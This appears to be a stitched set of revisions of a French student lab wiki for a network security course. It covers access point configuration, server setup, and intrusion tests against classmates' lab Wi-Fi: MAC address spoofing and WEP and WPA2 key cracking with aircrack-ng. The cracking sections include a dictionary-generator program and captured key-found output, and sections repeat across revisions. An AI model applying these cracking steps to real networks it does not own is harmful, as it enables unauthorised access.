<br />
</pre><br />
<br />
<br />
creation d'un dictionaire :<br />
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.<br />
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: <br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
<pre><br />
./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
Cassage de la cles: <br />
après avoir récuperer le Handshake du Wifi carotte06<br />
Je vais casser la clés en utilisant mon dictionnaire "Dico" le fichier "wpacracotte06-02.cap"<br />
<pre><br />
aircrack-ng -w Dico wpacracotte06-02.cap<br />
</pre><br />
<br />
après quelle que heures j'obtiens la clès:<br />
<pre><br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[02:00:57] 12399908 keys tested (1782.72 k/s)<br />
<br />
<br />
KEY FOUND! [ 12399906 ]<br />
<br />
<br />
Master Key : 4B 0E E0 87 93 06 14 C0 E2 64 55 76 95 9A 30 6B <br />
75 7C 8F CC B4 F8 2B 0D 78 3A 57 04 79 C2 F9 72 <br />
<br />
Transient Key : 63 0F 9B D4 8B 09 C9 2C D5 E2 56 3D C7 21 AC 9E <br />
94 5C E6 F7 19 FB EA 52 3F 02 C4 10 72 4F B8 7E <br />
F1 92 CC 2C 02 E1 F7 47 C1 1D F2 FD CE EF F5 5E <br />
22 24 87 42 46 4F D6 38 DF D4 CC 6D 61 4E 1D 7E <br />
<br />
EAPOL HMAC : A3 D3 FD F5 09 AC B9 96 F5 0E 93 0A 3C 63 36 CD <br />
</pre><br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23139
TP sysres IMA2a5 2015/2016 G3
2015-11-23T15:00:03Z
<p>Mstrunc : </p>
<hr />
<div><br /><br />
Ce mini projet a pour but de nous donner des notion en sécurité informatique.<br />
<br />
<br />
<h1>Configuration du point d’accès</h1><br />
<br />
<h2>Restriction par adresse MAC </h2><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h3>Configuration du point d’accès Cisco </h3><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h3>Configuration du Wifi sur l'eeePC</h3><br />
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.<br />
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. <br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h1>Installation des systèmes d'exploitation </h1><br />
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.<br />
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.<br />
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. <br />
<br />
<h2>Installation de la machine virtuel</h2><br />
Cette partie concerne l’installation du machine virtuel Xen.<br />
Nous installons Xen car celui-ci permet de faire de la paravirtualisation. <br />
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps <br />
<br />
Les étapes a suivre pour l’installation de Xen sur cordouan:<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
Configuration de Xen:<br />
- On autorise les connexion ssh en root<br />
- On retire Network Manger pour configurer la connexion au réseau manuellement <br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage systemd <br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
<br />
<br />
root@chien:~# apt-get install vim strace tcpdump <br />
root@chien:~# apt-get install host<br />
</pre><br />
<br />
<br />
<br />
<h1>Services Internet </h1><br />
<br />
<h2>Serveur DNS</h2><br />
modification du fichier /var/cache/bind option<br />
<pre><br />
cat /etc/bind/named.conf.options <br />
**** afficher le fichier ****<br />
<br />
host -t ni love-in-the-world.space<br />
host -t any love-in-the-world.space<br />
<br />
cat db.love-in-the-world <br />
**** afficher le fichier ****<br />
<br />
cat /var/log/daemon.log<br />
**** afficher le fichier ****<br />
<br />
service bind9 stop<br />
service bind9 start<br />
</pre><br />
<br />
<h2>Recuperation du certificat SSL</h2><br />
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur <br />
<br />
Instalation et Configuration de la boite Mail <br />
<pre><br />
apt-get install postfix bsd-mailx<br />
</pre><br />
<br />
configuration de la boite mail <br />
<pre><br />
#nano /etc/aliases<br />
postmaster: root<br />
admin: root<br />
<br />
#newaliases<br />
#mailx<br />
</pre><br />
<br />
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail <br />
E-mail: admin@love-in-the-world.space<br />
<br />
Verfification:<br />
<pre><br />
#mailx<br />
From Maxime.Strunc@polytech-lille.net Fri Nov 20 13:22:24 2015<br />
Return-Path: <Maxime.Strunc@polytech-lille.net><br />
X-Original-To: admin@love-in-the-world.space<br />
Delivered-To: admin@love-in-the-world.space<br />
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])<br />
by chien (Postfix) with ESMTP id E7DA93421F<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 13:22:24 +0100 (CET)<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])<br />
(Authenticated sender: mstrunc)<br />
by peronne.escaut.net (Postfix) with ESMTPA id 305081C38<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 11:33:52 +0100 (CET)<br />
MIME-Version: 1.0<br />
Content-Type: text/plain; charset=UTF-8;<br />
format=flowed<br />
Content-Transfer-Encoding: 7bit<br />
Date: Fri, 20 Nov 2015 11:33:52 +0100<br />
From: Maxime Strunc <Maxime.Strunc@polytech-lille.net><br />
To: <admin@love-in-the-world.space><br />
Subject: Hello<br />
Message-ID: <478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net><br />
X-Sender: Maxime.Strunc@polytech-lille.net<br />
User-Agent: Roundcube Webmail/0.7.2<br />
Status: RO<br />
<br />
Hey it's working<br />
</pre><br />
<br />
- Recupération du Certificat:<br />
Je vais sur Gandi.net<br />
<br />
génération de la CSR<br />
<pre><br />
root@chien:~# openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr<br />
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : <br />
admin@love-in-the-world.space<br />
</pre><br />
apres avoir renseigner tout les champs, <br />
j'obtient la CSR: <br />
<pre><br />
-----BEGIN CERTIFICATE REQUEST-----<br />
... texte crypter...<br />
-----END CERTIFICATE REQUEST-----<br />
</pre><br />
Je la copie dans l'emplacement voulue sur gandi.net<br />
<br />
Gandi m'envoi un mail a l'adresse informée "admin@love-in-the-world.space"<br />
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.<br />
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt<br />
<br />
<h1>Test d'intrusion </h1><br />
<br />
<br />
<h2>Intrusion par changement d'adresse MAC</h2><br />
<br />
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci. <br />
<br />
Changement d'adresse MAC:<br />
<pre><br />
- ifconfig wlan0 down<br />
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br />
- ifconfig wlan0 up<br />
</pre><br />
<br />
On change la cles par: 0000000000<br />
et le SSID : T1<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T1<br />
wireless-key 0000000000<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).<br />
<br />
<h2>Préparation aux cassage de clés</h2><br />
- Instalation aircrack-ng<br />
<pre><br />
apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h2>Cassage d'une cles WEP </h2><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
<br />
root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w<br />
fcracotte06<br />
<br />
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 <br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
ls<br />
aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
[00:06:58] Tested 965565 keys (got 60459 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) <br />
1 0/ 1 AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) <br />
2 0/ 1 AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) <br />
3 4/ 5 AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) <br />
4 0/ 1 AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) <br />
5 0/ 1 AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) <br />
6 0/ 1 AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) <br />
7 0/ 1 AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) <br />
8 0/ 1 AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) <br />
9 0/ 3 D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) <br />
10 0/ 1 5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) <br />
11 13/ 1 48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) <br />
12 0/ 1 BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) <br />
<br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] <br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h2>Cassage d'une cles WPA</h2><br />
Cette partie consiste a casser une clés WPA par force brute.<br />
Je m'interesse plus particulierement a caracotte06 comme précédament.<br />
<br />
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake. <br />
<br />
Recuperation du Handshake: <br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
<br />
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06<br />
<br />
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249
<br />
</pre><br />
<br />
<br />
creation d'un dictionaire :<br />
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.<br />
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: <br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
<pre><br />
./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
Cassage de la cles: <br />
après avoir récuperer le Handshake du Wifi carotte06<br />
Je vais casser la clés en utilisant mon dictionnaire "Dico" le fichier "wpacracotte06-02.cap"<br />
<pre><br />
aircrack-ng -w Dico wpacracotte06-02.cap<br />
</pre><br />
<br />
apres Quelle que heures j'obtiens la clès:<br />
<pre><br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[02:00:57] 12399908 keys tested (1782.72 k/s)<br />
<br />
<br />
KEY FOUND! [ 12399906 ]<br />
<br />
<br />
Master Key : 4B 0E E0 87 93 06 14 C0 E2 64 55 76 95 9A 30 6B <br />
75 7C 8F CC B4 F8 2B 0D 78 3A 57 04 79 C2 F9 72 <br />
<br />
Transient Key : 63 0F 9B D4 8B 09 C9 2C D5 E2 56 3D C7 21 AC 9E <br />
94 5C E6 F7 19 FB EA 52 3F 02 C4 10 72 4F B8 7E <br />
F1 92 CC 2C 02 E1 F7 47 C1 1D F2 FD CE EF F5 5E <br />
22 24 87 42 46 4F D6 38 DF D4 CC 6D 61 4E 1D 7E <br />
<br />
EAPOL HMAC : A3 D3 FD F5 09 AC B9 96 F5 0E 93 0A 3C 63 36 CD <br />
</pre><br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23138
TP sysres IMA2a5 2015/2016 G3
2015-11-23T14:57:09Z
<p>Mstrunc : </p>
<hr />
<div><br /><br />
Ce mini projet a pour but de nous donner des notion en sécurité informatique.<br />
<br />
<br />
<h1>Configuration du point d’accès</h1><br />
<br />
<h2>Restriction par adresse MAC </h2><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h3>Configuration du point d’accès Cisco </h3><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h3>Configuration du Wifi sur l'eeePC</h3><br />
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.<br />
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. <br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h1>Installation des systèmes d'exploitation </h1><br />
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.<br />
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.<br />
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. <br />
<br />
<h2>Installation de la machine virtuel</h2><br />
Cette partie concerne l’installation du machine virtuel Xen.<br />
Nous installons Xen car celui-ci permet de faire de la paravirtualisation. <br />
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps <br />
<br />
Les étapes a suivre pour l’installation de Xen sur cordouan:<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
Configuration de Xen:<br />
- On autorise les connexion ssh en root<br />
- On retire Network Manger pour configurer la connexion au réseau manuellement <br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage systemd <br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
<br />
<br />
root@chien:~# apt-get install vim strace tcpdump <br />
root@chien:~# apt-get install host<br />
</pre><br />
<br />
<br />
<br />
<h1>Services Internet </h1><br />
<br />
<h2>Serveur DNS</h2><br />
modification du fichier /var/cache/bind option<br />
<pre><br />
cat /etc/bind/named.conf.options <br />
**** afficher le fichier ****<br />
<br />
host -t ni love-in-the-world.space<br />
host -t any love-in-the-world.space<br />
<br />
cat db.love-in-the-world <br />
**** afficher le fichier ****<br />
<br />
cat /var/log/daemon.log<br />
**** afficher le fichier ****<br />
<br />
service bind9 stop<br />
service bind9 start<br />
</pre><br />
<br />
<h2>Recuperation du certificat SSL</h2><br />
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur <br />
<br />
Instalation et Configuration de la boite Mail <br />
<pre><br />
apt-get install postfix bsd-mailx<br />
</pre><br />
<br />
configuration de la boite mail <br />
<pre><br />
#nano /etc/aliases<br />
postmaster: root<br />
admin: root<br />
<br />
#newaliases<br />
#mailx<br />
</pre><br />
<br />
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail <br />
E-mail: admin@love-in-the-world.space<br />
<br />
Verfification:<br />
<pre><br />
#mailx<br />
From Maxime.Strunc@polytech-lille.net Fri Nov 20 13:22:24 2015<br />
Return-Path: <Maxime.Strunc@polytech-lille.net><br />
X-Original-To: admin@love-in-the-world.space<br />
Delivered-To: admin@love-in-the-world.space<br />
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])<br />
by chien (Postfix) with ESMTP id E7DA93421F<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 13:22:24 +0100 (CET)<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])<br />
(Authenticated sender: mstrunc)<br />
by peronne.escaut.net (Postfix) with ESMTPA id 305081C38<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 11:33:52 +0100 (CET)<br />
MIME-Version: 1.0<br />
Content-Type: text/plain; charset=UTF-8;<br />
format=flowed<br />
Content-Transfer-Encoding: 7bit<br />
Date: Fri, 20 Nov 2015 11:33:52 +0100<br />
